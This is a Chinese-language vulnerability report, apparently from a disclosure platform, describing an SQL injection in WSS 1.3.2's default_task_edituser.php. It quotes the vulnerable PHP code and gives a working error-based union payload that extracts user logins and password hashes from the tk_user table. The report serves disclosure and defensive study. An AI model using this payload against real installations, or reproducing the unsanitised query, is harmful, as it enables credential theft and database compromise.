WSS最新版某处SQL注入直接获取数据

### 简要描述： WSS最新版某处SQL注入直接获取数据 ### 详细说明： WSS最新版1.3.2 在任务执行人修改处存在SQL注入 default_task_edituser.php文件： ``` <?php require_once('config/tank_config.php'); ?> <?php require_once('session.php'); ?> <?php $restrictGoTo = "user_error3.php"; if ($_SESSION['MM_rank'] < "2") { header("Location: ". $restrictGoTo); exit; } $taskid = $_GET['taskid']; $nowuser = $_SESSION['MM_uid']; $to_user = "-1"; if (isset($_POST['csa_to_user'])) { $to_user= $_POST['csa_to_user']; } mysql_select_db($database_tankdb, $tankdb); $query_touser = "SELECT * FROM tk_user WHERE uid = '$to_user'"; $touser = mysql_query($query_touser, $tankdb) or die(mysql_error()); $row_touser = mysql_fetch_assoc($touser); $totalRows_touser = mysql_num_rows($touser); ``` 这里的$to_user没有使用全局的GetSQLValueString函数处理，导致SQL注入 这里使用普通用户即可测试 ### 漏洞证明： ``` http://localhost/WSS1.3.2_cn/wss/default_task_edituser.php ``` [<img src="https://images.seebug.org/upload/201411/211603295cb1212e95efa9e438d6a6c95e13d426.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/211603295cb1212e95efa9e438d6a6c95e13d426.png) ``` http://localhost/WSS1.3.2_cn/wss/default_task_edituser.php csa_to_user=123' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,tk_user_login,0x23,tk_user_pass) from tk_user limit 0,1))a from information_schema.tables group by a)b%23 ``` [<img src="https://images.seebug.org/upload/201411/21160357d88be88c7570d3d9404722bc875884c4.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21160357d88be88c7570d3d9404722bc875884c4.png)